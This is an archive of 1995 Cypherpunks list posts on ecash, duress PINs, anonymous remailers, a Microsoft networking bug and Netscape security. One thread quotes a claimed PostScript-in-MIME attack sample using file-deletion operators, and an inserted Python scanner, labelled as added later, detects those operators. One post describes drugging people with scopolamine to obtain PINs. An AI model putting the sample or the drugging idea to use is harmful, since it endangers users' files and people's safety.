It will have the same features as the Ecash used in the trial. Payer is
anonymous, but the payee isn't. I hope that I'll be able to finish some
perl scripts that add this badly needed, but for political reasons
missing, feature by the end of the month.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMIRvWioZzwIn1bdtAQHT8wF+JUheIIJxAV4ER1+lPddZhr744rR9N0/f
Ps0CIGNK9Ie16XVBMXx4J0OkKqCjP0PW
=HFWw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 17 Oct 95 23:12:19 PDT
To: cypherpunks@toad.com
Subject: Re: A comment about Netscape 2 and certifictes
In-Reply-To: <199510180307.XAA23559@book.hks.net>
Message-ID: <308499D0.4412@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


This is exactly the same list that was in Netscape 1.x.  The
commercenet CA only appeared in 1.2 and the 1.22/1.12 security
update.  This list will change before 2.0 is released.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VINCENT810@aol.com
Date: Tue, 17 Oct 95 20:43:08 PDT
To: Cypherpunks@toad.com
Subject: I want to learn!
Message-ID: <951017234254_126621887@mail06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Can someone please show me the ropes on becoming a cypherpunk!!!! Thanxs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 21:32:45 PDT
To: cypherpunks@toad.com
Subject: Truth serum, tuition & Re: PINs
In-Reply-To: <199510180315.EAA27271@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9510172359.A22460-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, Anonymous wrote:

> What if You had Two PINs ???
> And One Works and One Sounds a Silent Alarm Then If You are Forced 
> to give your PIN ,You give Them your Second PIN 
> and They get Caught !!!!!!
Yeah, that's what was being talked about: duress pins. Except (see 
previous messages) the problems arise from the fact that all criminals
will presumably know this and have some computational resources to deal
with it (seeing how fast tuitions are rising around here, I predict the 
majority of ecash thieves will be CS undergrads who missed out on 
scholarships).

[warning, severely low crypto relevance]

OTOH, might as well carry around syringes filled with scopolamine (truth
serum) if you intend on getting the real PIN. This stuff is actually legally
obtainable from seeds of plants of the Datura family, as in Belladonna (aka 
Nightshade), Stramonium (aka Jimson Weed) and a few others. They can be 
obtained from a variety of botanical catalogs (and probably in your 
backyard) and are highly toxic hallucinogens (only the bad ones are legal). I 
think their chemicals (atropine, hyoscyamine and scopolamine) are also 
available as pharmaceuticals as they have some legitimate medical applications.

I've heard from several sources that the US mil also checked it out 
(once upon a paranoid rumor that turned into an urban legend mayhap) as 
truth serum. Supposedly in certain S. American countries it has been used 
for quite some time in thefts. An added benefit is amnesia. 

Perfect way to gain people's PINs, pgp keys, home keys, non-essential 
organs, bank accounts, state secrets, astrological advice...). The antidote is
legal in all countries except either Colombia or Brazil (can't remember which, 
ironically, it's the place where the most such thefts occur. The thieves 
must have a strong lobby.).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 17 Oct 95 22:45:42 PDT
To: sameer <sameer@c2.org>
Subject: Netscape whining virus, was Re: Netscape rewards are an insult
In-Reply-To: <199510180451.VAA23663@infinity.c2.org>
Message-ID: <Pine.3.89.9510180127.A64777-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 17 Oct 1995, sameer wrote:

> > 
> > I am not quite sure what problem you are talking about? NFS and MITM
> > ftp attacks?
> 
> 	This character has been going on and on regarding some big
> hole he apparently found in netscape, but no one else on the list
I guess he/it must be some existentially frustrated Java virus.
(apologies in advance, couldn't resist)

(my little contribution: People download binaries off the net all the time.
Code gets infected and infects PCs. Big deal. Infected PC's on networks can 
infect the rest of that network and call in even more infectious code from 
across the net. So what? I'm sorry, is this a new concept here?
It doesn't take netscape/java to do this. It's been possible to do this
in C for the longest time. Just takes a little more effort.)

These opinions are not even my own. Blame them on my non-algorithmic OTP and 
its good friend Mr. Line Noise.
       





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: usura@berserk.com (Alex de Joode)
Date: Tue, 17 Oct 95 19:07:23 PDT
To: cypherpunks@toad.com
Subject: [ANNOUNCEMENT] eCash reality !!
Message-ID: <3R85cD1w165w@berserk.com>
MIME-Version: 1.0
Content-Type: text/plain



e-WAVE [issue 42], a dutch language electronic newsletter
published by Riverland Publications, reports that DigiCash 
has reached agreement with a big US bank to make eCash real. 

DigiCash promised the 'scoop' to Newsweek, so in next monday's 
issue of Newsweek we will know which bank that is. (They are also 
said to be talking with a Dutch or Belgian bank or financial 
institution). 

Since there has been cut a deal with the monetary powers I wonder 
if we get the whole anonymous ecash or a 'diluted species'.

-AJ- 

For the many subscribers of the cypherpunks mailinglist that 
are able to read Dutch, here is the portion of e-WAVE that has 
the announcement. <g>

------BEGIN QUOTE------

During the explanation of how Digicash's encryption technology
can be applied to voting, the renowned e-cash comes up.
Dinnissen has a scoop but may not give anything away yet:
'Next Monday we will announce which big American bank Digicash
is partnering with to make e-cash a legitimate and valid means
of payment.' WHAT!!! E-CASH LEGAL?! Wow, time to count the
cyberbucks right away. And with which bank? 'I can't say.'
Dutch or Belgian banks as well? 'There are also talks closer
to home, yes.' Can that really just be done? 'Agreements have
been made with monetary authorities. The scoop has been promised
to the American magazine *Newsweek*, which comes out that
Monday.' (Shit) More on this soon.

For more information mail: erwin@wave.riv.nl

------END QUOTE------

 88888b   d888b  888b  88 8P 888888   88888b    888     888b  88 88  d888b 88
 88   88 88   88 88`8b 88      88     88   88  88 88    88`8b 88 88 88   ` 88
 88   88 88   88 88 88 88      88     88888P  88   88   88 88 88 88 88     88
 88   88 88   88 88 `8b88      88     88     d8888888b  88 `8b88 88 88   , ""
 88888P   `888P  88  `888      88     88     88     `8b 88  `888 88  `888P 88




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 04:00:28 PDT
To: cypherpunks@toad.com
Subject: Re: The Anonymous Bounty Claim
In-Reply-To: <199510180451.VAA23663@infinity.c2.org>
Message-ID: <3084DD5B.4AD1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Mats Bergstrom wrote:
> I am not technically competent to judge if his/her claim is worth
> reposting, but here it is, clipped from the very long Friday 13
> rant, as found at Raph's index site (Subject: Bugs Bounty??...shhh...
> I'm huntin wa'bits... From:anonymous-remailer@shell.portal.com).

  Thanks for digging this one out.  I looked and didn't find it in
our local spool.

Alice de 'nonymous wrote:
> >>Content-type: multipart/x-mixed-replace; boundary=ThisRandomString
> >>
> >>--ThisRandomString
> >>Content-type: application/postscript
> >>
> >>Data for the first object
> >>
> >>--ThisRandomString
> >>Content-Type: multipart/parallel; boundary=ThisSecondRandomString
> >>
> >>--ThisSecondRandomString
> >>Content-Type: application/postscript
> >>
> >>Data for the second object
> >>
> >>--ThisSecondRandomString
> >>Content-type: application/postscript
> >>
> >>Deletefile
> >>Renamefile
> >>Filenameforall
> >>File
> >>
> >>--ThisSecondRandomString--
> >>
> >>--ThisRandomString--
> 
> I think that the foregoing explains itself without me having to draw any
> more maps, than is absolutely necessary. The first data object sent is
> application/postscript. The second object is multipart/parallel.

  The above appears to be total trash:

	1) Netscape does not know about multipart/parallel, and will
		bring up a "save as" dialog when it is encountered.

	2) The whole multipart/x-mixed-replace, multipart/parallel,
		server push thing is not interesting.  The final
		part with the naughty postscript could just be
		the main document.

	3) Netscape does not ship with a helper app configured for
		application/postscript.

  If a user configures a postscript viewer that has not had the
file operations disabled as a helper app to any web browser then
they are opening themselves up for a world of hurt.  The same is
true if they just download the file and run their viewer on it
manually.  The same is true if they configure /bin/sh as an
external viewer.

  Obviously everyone should heed perry's warnings and emasculate
their postscript interpreters before using them to view files
of unknown origin.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
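
A defensive screen for the case discussed above, added here as an example and not code from the original posts or from Netscape: it walks a MIME message, including nested multipart bodies like the quoted one, and reports PostScript parts that use the file operators named in the quoted sample. The function names, the case-insensitive match and the "%!" content sniff are assumptions of this sketch; the sample message is constructed from the structure quoted above.

```python
import re
from email import message_from_string

# PostScript file-system operators named in the quoted post.
FILE_OPERATORS = ("deletefile", "renamefile", "filenameforall", "file")

# Match operators as whole tokens. Real PostScript operators are lowercase;
# matching case-insensitively is a deliberately loose choice (assumption) so
# that the capitalised sample from the post is also caught.
TOKEN = re.compile(
    r"(?<![A-Za-z0-9_])(" + "|".join(FILE_OPERATORS) + r")(?![A-Za-z0-9_])",
    re.IGNORECASE,
)

# Constructed sample reproducing the nesting quoted in the post.
SAMPLE = """\
Content-type: multipart/x-mixed-replace; boundary=ThisRandomString

--ThisRandomString
Content-type: application/postscript

Data for the first object

--ThisRandomString
Content-Type: multipart/parallel; boundary=ThisSecondRandomString

--ThisSecondRandomString
Content-Type: application/postscript

Data for the second object

--ThisSecondRandomString
Content-type: application/postscript

Deletefile
Renamefile
Filenameforall
File

--ThisSecondRandomString--

--ThisRandomString--
"""


def looks_like_postscript(part, text):
    """True if the part is labelled PostScript or starts with the %! magic."""
    if part.get_content_type() == "application/postscript":
        return True
    return text.lstrip().startswith("%!")


def scan(raw_message):
    """Return [(part_path, content_type, [operators])] for PostScript parts
    that reference file operators. part_path is "root" for a single-part
    message, otherwise dotted 1-based indices such as "2.2"."""
    findings = []

    def visit(part, path):
        if part.is_multipart():
            # Any multipart/* subtype is descended into, known or not.
            for index, child in enumerate(part.get_payload(), start=1):
                visit(child, path + (index,))
            return
        body = part.get_payload(decode=True) or b""   # undoes base64/QP
        text = body.decode("latin-1")
        if not looks_like_postscript(part, text):
            return
        operators = sorted({m.group(1).lower() for m in TOKEN.finditer(text)})
        if operators:
            label = ".".join(str(i) for i in path) or "root"
            findings.append((label, part.get_content_type(), operators))

    visit(message_from_string(raw_message), ())
    return findings


if __name__ == "__main__":
    for path, ctype, operators in scan(SAMPLE):
        print("part %s (%s) uses: %s" % (path, ctype, ", ".join(operators)))
```

The multipart wrapping makes no difference to the result: the same operators are reported when the PostScript is the main document, which matches point 2 of the reply above. A screen like this complements, and does not replace, disabling file operations in the interpreter itself.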




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 17 Oct 95 20:15:41 PDT
To: cypherpunks@toad.com
Subject: PINs
Message-ID: <199510180315.EAA27271@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


What if You had Two PINs ???
And One Works and One Sounds a Silent Alarm .
Then If You are Forced to give your PIN ,You give Them your Second PIN 
and They get Caught !!!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Modemac <modemac@netcom.com>
Date: Wed, 18 Oct 95 04:59:35 PDT
To: cypherpunks@toad.com
Subject: Anonymity: A Modest Proposal
Message-ID: <Pine.3.89.9510180431.A22347-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
Several weeks back, I posted a message stating the need (in my opinion)
for a system of anonymity on the Internet that would be more secure than
the anonymous remailers.  Despite the valuable service provided by the
remailers, I am troubled by their vulnerability.  It seems likely that
at some point in the near future, a remailer is going to be silenced,
and possibly (though not inevitably) the contents of its database made
public.  This may possibly lead to criminal charges being filed against
someone, based on alleged criminal acts in which the remailer plays a
part.
 
(I am not going to state what these "criminal acts" may be, because I
don't know which ones will be involved.  I don't know when this blow to
the remailer system will come, or who it will happen to.  I simply
believe that, given the growing trend towards censorship and 
anti-privacy in government and business circles, the blow will come
sooner or later.)
 
The vulnerability of the remailer system, in my opinion, rests in the
fact that a remailer is physically located in a certain place.  This
makes the remailer a target for attacks, as shown by the futile
efforts (so far) of the so-called "church" of Scientology to silence
the remailers at anon.penet.fi and xs4all.nl.  (The original demand
of Scientology in the Penet affair was for the entire contents of
Julf's database to be revealed, but fortunately Julf was able to limit
the exposure to a single user.  When Scientology attempted to raid
xs4all, their original seizure order was against the remailer itself
- -- but fortunately (again) the remailer itself had been closed two
months before.  The representative of Scientology had to re-phrase the
seizure order on the spot, declaring instead that the reason for the
seizure was the existence of the infamous "Fishman Affidavit" on
an xs4all Web page.)
 
I believe a system of anonymity is needed that can withstand attacks
of this sort.  The current remailer system may be able to weather the
oncoming storm, but it will suffer damage in the process.  A system
to reduce the effect of pro-censorship forces on sources of online
anonymity is needed.
                                      
But what shall this system be?
 
Since the prime vulnerability of the remailers rests in their physical
locations, we have the possibility of physically hiding their
locations.  This is impossible in the long run, and it hampers the
ability to set up a remailer on a short-term basis.  How hard is it to
set up a node that is hidden from efforts to discover its location?
If setting up a remailer requires you to go into hiding, many 
would-be privacy activists will be dissuaded from giving it a try.
 
Rather, I wonder if it would be possible to devise a system that
introduced a random element into the picture, one that lessens the
possibility of blame being placed on any one individual, or any one
site.  The Netherlands responded to Scientology's attack on xs4all
by spreading the Fishman Affidavit far and wide.  At the time of this
writing, this document now exists on more than eighty Web pages in
Holland, and this makes it far more difficult for Scientology to stop
the spread of information.  (They are still trying, however.  The
latest word from Europe is that a member of Scientology's "Office of
Special Affairs" has flown to Europe, and is now calling service
providers and individual users.  A lawyer for Scientology is there as 
well.  See alt.religion.scientology for more details of this case.)
 
Using Scientology as an example once again (this will be my last
mention of it, I promise), note the failure of the "church" to shut
down alt.religion.scientology.  They have tried every possible means
to prevent the newsgroup from spreading information to the world, and
every attempt to stop this "leak" has failed.  If it was possible to
effectively eradicate a newsgroup, Scientology would certainly have
done so by now.  Alt.religion.scientology cannot be shut up because it
is distributed to thousands of sites around the world, thus making it
impossible to shut them all down.
 
That's why I believe a newsgroup for anonymous messages would be able
to withstand attacks by would-be censors.
 
Previously, I had suggested the possibility of a "moderated" anonymous
newsgroup that would forward all postings to the address of the
"moderator," where they might then be randomly distributed to
remailers before being posted to the anonymous newsgroup.  However,
that idea had several inherent weaknesses, including attacks on the
"moderation" site and newgroup messages designed to compromise the
newsgroup and send postings to other places.  The way to prevent a
newsgroup from being compromised in this manner, then, would use a
different method -- one that is immune to control messages.
 
In the course of discussion with a group of cyberpunks on IRC a couple of
days ago, another possible system for anonymity was devised.  This
system can rely on an unmoderated newsgroup as a source for messages.
Instead of forwarding messages to an address in order to hide the ID
of an anonymous poster, it was suggested that PGP be used to protect
the messages themselves.  
 
The basic idea for this system goes like this:
 
     1) A person writes a message and encrypts it with PGP.
     2) That person then posts his message to the "anonymous messages"
        newsgroup.
     3) A remailer scanning the newsgroup picks up the message,
        decrypts it, strips the headers and makes it anonymous, and
        sends it to its destination.
 
Because the anonymous messages come to the remailer by scanning a
newsgroup, tracking a remailer's incoming-mail logs would be useless.
To offer further protection for the remailers, a random system could
be devised to ensure that no one knows exactly which remailer scans a
particular message at a particular time.
 
I am not a programmer, and some of the technical details in this
proposal go over my head.  Hopefully you can clarify some of the
points presented here and see if this system is possible or not.
 
The actual remailer code, involving scanning the newsgroup for
PGP-encrypted messages and stripping headers, could be written with
PERL scripts.  This would keep it portable, and it would be easy for 
a person to tell if it has been tampered with.  This code would be
distributed widely.
 
A series of remailers would be used to decrypt anonymous messages.
A "token" (like the token ring of IBM fame) would be passed back and
forth between all of the Cryptoclients in the remailer network, so
that only one remailer would be "active" at any given time.  This
token would be passed back and forth at random, so no one would know
exactly which remailer is being used to anonymize a message.
 
The "token" is the key to this remailing system.  This token would
include necessary information such as the last message scanned, and
to coordinate timing among the remailers.  This will work to avoid
duplication of messages.  (Of course, the remailers should also hold
messages for a random amount of time -- say, up to two hours -- in
order to prevent someone from being traced, based on the time he
posted his encrypted message to the newsgroup.)
 
The decryption key for the anonymous messages would be created using a
2047-bit PGP key.  To prevent this key from falling into the wrong
hands, a "web of trust" could be used to pass pieces of the key among
each other.  If enough remailer sites trust a site, that site
will receive enough pieces of the group key to be able to respond and
"accept" the token.
 
The public key for this PGP key would be sent to the keyservers.
People would encrypt their messages using this key.
 
The mental image I have is that of a virtual "anon demon," zipping
back and forth among the network of remailer sites, stopping at each
site to scan messages from the newsgroup and send them to their
destinations.  If a large network of remailers is connected in this
fashion, it becomes impossible to stop anonymous messages
from reaching their destination simply by attacking one site, or even
a series of sites.  The "anon demon" would simply bypass the
compromised sites and use other points in the network.
 
Comments are welcome concerning the vulnerability of this system, its
complexity, its ability to withstand attacks, and any other
constructive criticism.
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQCVAwUBMIToGR7ohFhEPknNAQHEtwP9EmdEVtNoEJC6MtokZs66ea27Nx874K+s
ueOiX21QL01SGjn7AvHUxTDPSiNXdnqSlDRqsnc2nefNlkhc2bzZklovlnZ15XC/
ZUxRWtCBk0LFoPyxbc/kEOM2cjqJdZ4llxYRHed0RcH0ABvYcGv8ZTjxtKEwN9Sy
IDxmiTlqHXU=
=yLqV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: llurch@Networking.Stanford.EDU (Richard Charles Graves)
Date: Wed, 18 Oct 95 06:23:08 PDT
Subject: Re: Microsoft: WFW & Win95 TCP/IP is insecure, and alleged serious computer crime
In-Reply-To: <45rims$9fc@Networking.Stanford.EDU>
Message-ID: <462r32$mj@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Posted, emailed, and archived. I probably should have talked to a lawyer
first. Oh well. Followup-To poster (that means email) or spawn new threads.
The FAQ is at http://www-dccs.stanford.edu/NetConsult/Win95Net/faq.html. 
It's getting dated; please download the new.txt link, in UNIX mbox format.
The quixote list archive server has been turned off for security reasons.

-----BEGIN PGP SIGNED MESSAGE-----

In article <461u88$luk@dingo.cc.uq.oz.au> in a few newsgroups, 
DavidS@gpo.pa.uq.edu.au (David Steadson) writes:
>In article <45rims$9fc@Networking.Stanford.EDU>, llurch@Networking.Stanford.EDU 
>says...
>>
>>Note that Microsoft's "in order to have this problem, there must be a
>>UNIX computer on your network" really means "if you're connected to the
>>Internet, and you're not behind a firewall that disallows all SMB
>>traffic, you have this problem." Some other bits are misleading as well.
>
>Ummm, this is new??  I knew about this security hole in MS TCP/IP months ago, 
>via newsgroups.

Lots of things are new, and very interesting, especially for Usenet 
readers, because the story involves forged cancels, apparently stolen 
passwords, and serious computer crime. I'm so glad you asked.

Unsurprising Fact: Microsoft has finally acknowledged and documented the
problem, and, without fanfare, released a patch for Windows for Workgroups
that claims to fix it. 

Fact: several people at Microsoft have been lying about the problem. In
early September, paulbal@microsoft.com assured a gathering of Stanford
computing support staff that the problem had been fixed in build 490, so I
looked no further into it. For a while.

Fact: On September 27, I reposted a July article from the SAMBA email list 
archive about the bug you know all about. I asked for confirmation 
on whether it had been fixed in the release version of Win95, and whether 
a fix was available for WFW.

Supposition: Early morning September 28, my kerberos password was
apparently hacked, and my .forward file was disabled on several UNIX
machines, preventing me from receiving some personal and work-related
email. I did not notice this problem until October 6 because I seldom log
on to the machines in question. 

Fact: On September 28, I received several replies to my post, several
saying that Microsoft had assured them that it had been fixed at some
specified (often specified different) build. I also received two replies
that the problem had *not* been fixed, and volunteering to reproduce the
problem for me. 

Fact: I posted the confirmation of the bug to win95netbugs@lists.stanford.edu.

Fact: The Windows for Workgroups security bug fix patch on Microsoft's FTP 
server is dated late night September 28.

Fact: On October 2, Paul_Krill@InfoWorld.Com phoned and emailed me
inquiring about the problem. He had also been assured by Microsoft sources
that the problem had been fixed. I forwarded several articles his way
indicating that it had not been fixed. I again searched the Microsoft
Knowledge Base for any mention of "SAMBA" or "SMBCLIENT" and found none. 

Fact: On October 4, I received an email message from henrysa@microsoft.com
inquiring about the problem and offering to investigate for me the current
status of the problem. In reply, I sent him the three email messages that
are included at the bottom of this post. I have not received any sort of
reply from Henry. 

Fact/Supposition: October 2 (?), somebody made a directory on a Stanford
FTP server world-readable and world-writeable, uploaded several megabytes
of "warez," and advertised the site on hacker BBSes. Since many people had
access to this directory, there were no suspicions about who was
responsible. My kerberos password, which I now believe was stolen, would
have been sufficient to cause this problem. 

Fact: Late night/early morning October 14-15, in a routine browse of the
Microsoft Knowledge Base, I came across articles on the SMB security bugs,
which we all know about now. I posted them, with commentary rather less 
lurid than what you have seen from me since, when I was perturbed. 

Fact: The article was canceled. On this day 10/18/95, under penalty of
perjury, I swear that it was not canceled by me. My PGP signature should 
be legally binding.

Fact: I also Cc'd the article to \win95netbugs and myself via email. The 
email made it. NewsWatcher works such that separate Message-IDs are 
created for news and email, and someone reading the news post has no way 
of knowing whether the article was also emailed.

Supposition: the canceler did not know that NewsWatcher worked this way.

Fact: In the morning, I noticed the article was missing, but that earlier 
and later articles by me were there. I figured something must have gone 
wrong, so I reposted it.

Fact: From 12:10 to 5PM, I was with Kevin Morris at Sacred Heart school in
Atherton, building a local PhoneNET network. Obviously, I had no Internet
access. While I was there, my second post of the article was canceled.

Fact: Around 7PM, I noticed the second cancel, and a followup thereto from
a netcom account confirming that the article had been posted and
propagated, got really pissed off, and posted it a third time. I also
posted to news.admin.net-abuse.misc and our local news administration 
group. I also Cc'd several PC and networking magazines via email, and 
cross-posted to a .test group so that I would have verification of the 
propagation of the article in hand.

Fact: Today, as was the case 15 hours after it was posted, article
<llurch-1510951157410001@tip-mp3-ncs-3.stanford.edu>, to which there was
that netcom followup, is missing, presumed canceled, from the core
Stanford news servers nntp and csd-newshost. It is present on the
secondary news host morrow.stanford.edu, and on external sites. No one 
has been able to provide any explanation for this.

Supposition: the canceler either screwed up or canceled the cancel or,
more likely, forged a repost after seeing the netcom followup. For some
reason, however, the article did not make it back onto nntp or 
csd-newshost.

Fact: Later that night and in the morning, I received copies of the 
forged cancels of my messages as seen from nasa.gov, rand.org, and 
mcom.com. I posted them to news.admin.net-abuse.misc.

Supposition: an individual or group has gone to great lengths, engaging in 
quite a bit of highly illegal and unethical behavior, in order to cover up 
security and networking bugs in Microsoft products. 

Opinion: they have failed. In a big, big way.

- -rich graves
 distributed computing and communication systems
 stanford university
 llurch@networking.stanford.edu

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMITf34ND7LjhcPQ9AQGlsQP+KFNuOehBPLExKjJc0e/7bv8iAF29bYgi
o4ioLYuwx4AKtR2hER85PWWPNBuDO+G8uqDBcDNzKZ+VxrNDWvhP9oSfTy9ry9OM
p5hkcQfB/MqqeDZ5nFOXmTkI2y+EI3az1lHWBr9kQuSalpAVkXTx0/qeW9WWYVFZ
cuZ8+Tf3W7o=
=G/Dk
-----END PGP SIGNATURE-----

Unanswered letters to henrysa@microsoft.com:




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 05:26:48 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181156.AA11525@all.net>
Message-ID: <3084F191.56FE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> 
> Jeff Weinstein - Electronic Munitions Specialist Wrote:
> 
> ...
> >   If a user configures a postscript viewer that has not had the
> > file operations disabled as a helper app to any web browser then
> > they are opening themselves up for a world of hurt.  The same is
> > true if they just download the file and run their viewer on it
> > manually.  The same is true if they configure /bin/sh as an
> > external viewer.
> >
> >   Obviously everyone should heed perry's warnings and emasculate
> > their postscript interpreters before using them to view files
> > of unknown origin.
> 
> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:
> 
>         "Netscape can be used securely by sufficiently knowledgeable
>         users who have emasculated their postscript interpreters before
>         using them to view files of unknown origin, and who have removed
>         all other known, unknown, and/or undisclosed security holes from
>         their systems.  Otherwise, Netscape is insecure and should not be
>         trusted."

  Why did I know you would be showing up in this discussion?  You
wouldn't be related to alice de 'nonymous would you?

  I don't believe that Netscape claims to be some magic bullet that
will suddenly make your system secure when you install it.  We also
don't claim that it will detect viruses.

  Don't you think we've wasted enough bandwidth on this?  I'm sure
most readers of this list are sick of it by now.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 05:49:32 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Postscript in Netscape
In-Reply-To: <9510181233.AA12939@all.net>
Message-ID: <3084F6E4.210E@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> >   Why did I know you would be showing up in this discussion?  You
> > wouldn't be related to alice de 'nonymous would you?
> 
> Is it Netscape's position that when people call them on their statements
> they make irrelevant comments and inflammatory remarks toward legitimate
> researchers who are freely helping them understand the security issues
> they apparently don't understand?

  Perhaps that comment was out of line.  If I offended you I apologize.

> >   I don't believe that Netscape claims to be some magic bullet that
> > will suddenly make your system secure when you install it.  We also
> > don't claim that it will detect viruses.
> 
> You claim that you provide secure net access for the purposes of
> transactions - which you don't - and you have gotten an enormous amount
> of money from people who don't understand these issues based, at least
> in part, on your false claims.  Some people might interpret that as fraud.
> 
> Now instead of trying to insult and put down people who have legitimate
> security concerns, you personally attack individuals, try to redirect the
> discussion away from the security flaws in Netscape, and try to hush the
> discussion with:

  I don't see how any product could meet your definition of "secure".
I think you've made your point, and I don't agree with it.  How you
pursue the matter is of course up to you.

> >   Don't you think we've wasted enough bandwidth on this?  I'm sure
> > most readers of this list are sick of it by now.
> 
> I think that you should give a copy of this and the other messages on
> this topic to someone at Netscape who is responsible for protection and
> ask them to speak for the company and address these issues head on.
> Regardless of your disclaimer, when you speak on the net, we hear
> Netscape, and the sounds are starting to sound more and more like
> Microsoft to me.

  If you wish to get an official statement from Netscape, you should
contact our PR department.  Their number is 415-528-2802.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu
Date: Wed, 18 Oct 95 03:50:29 PDT
To: cypherpunks@toad.com
Subject: I want to learn!
Message-ID: <9509188140.AA814024129@ccmail.odedodea.edu>
MIME-Version: 1.0
Content-Type: text/plain



>From: VINCENT810@aol.com
>Message-Id: <951017234254_126621887@mail06.mail.aol.com> 
>To: Cypherpunks@toad.com
>Subject: I want to learn!
>Sender: owner-cypherpunks@toad.com
>Precedence: bulk
     
>Can someone please show me the ropes on becoming a cypherpunk!!!! Thanxs.
     
     Me Too, I'm catching on but some help would help !
     
     
     Leo_Martensen_at_~~HEID-DHS@ccmail.odedodea.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 18 Oct 95 06:55:06 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <Pine.3.89.9510180431.A22347-0100000@netcom4>
Message-ID: <199510181353.GAA25545@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Modemac proposes sending messages to remailers via newsgroup postings.

This is not a bad idea, although I would not use a shared secret key
for all remailers, but rather use a stealth system and encrypt for a
specific remailer.  However, it doesn't go to the crux of the problem.

From my experience operating two remailers, ALL complaints are the result
of SENDING messages, not RECEIVING them.  This is how I can tell: my two
remailers, hal@alumni.caltech.edu and hfinney@shell.portal.com, are
different.  The first one is run on a "free" account whereas the second I
pay $20 to $50 a month for.  Also, the management at Portal has
demonstrated commitment to cypherpunk type goals.  So I view that
remailer as much stronger, politically.

As a result I have my alumni.caltech.edu remailer configured to forward
all messages via the portal remailer.  That means that no one will EVER
see an anonymous message from hal@alumni.caltech.edu.  People can send
messages to that remailer, but they come out via the portal one.

Now, since I have set it up this way, which was about two years ago, I
have not received a single complaint about operating the remailer at
alumni.caltech.edu.  Nobody sends me mail saying "your system is
accepting objectionable messages."  Instead, all the complaints I get are
about the Portal remailer (averaging one per week, probably).  People
complain when they receive a message or newsgroup posting that they find
objectionable.  They don't care if some system is accepting messages.
They care about the system which is sending them.

This has always been the weak link in the remailer system: the last
remailer in the chain takes the political and legal heat.  If there is
ever a libel or copyright infringement suit, or criminal prosecution,
against a remailer it will almost certainly be against the last remailer
in the chain.  Those are the source of the complaints and those are the
ones which people try to shut down.

So I don't think schemes to produce "virtual remailers" and such are
going to work unless you have a very secure remailer as the last in the
chain.  And once you have that there is not much need to change the
system for accepting messages into the remailer net.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Wed, 18 Oct 95 07:15:04 PDT
To: cypherpunks@toad.com
Subject: Re: I want to learn!
Message-ID: <v01530500acaac8503ff6@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>>From: VINCENT810@aol.com
>>Message-Id: <951017234254_126621887@mail06.mail.aol.com>
>>To: Cypherpunks@toad.com
>>Subject: I want to learn!
>>Sender: owner-cypherpunks@toad.com
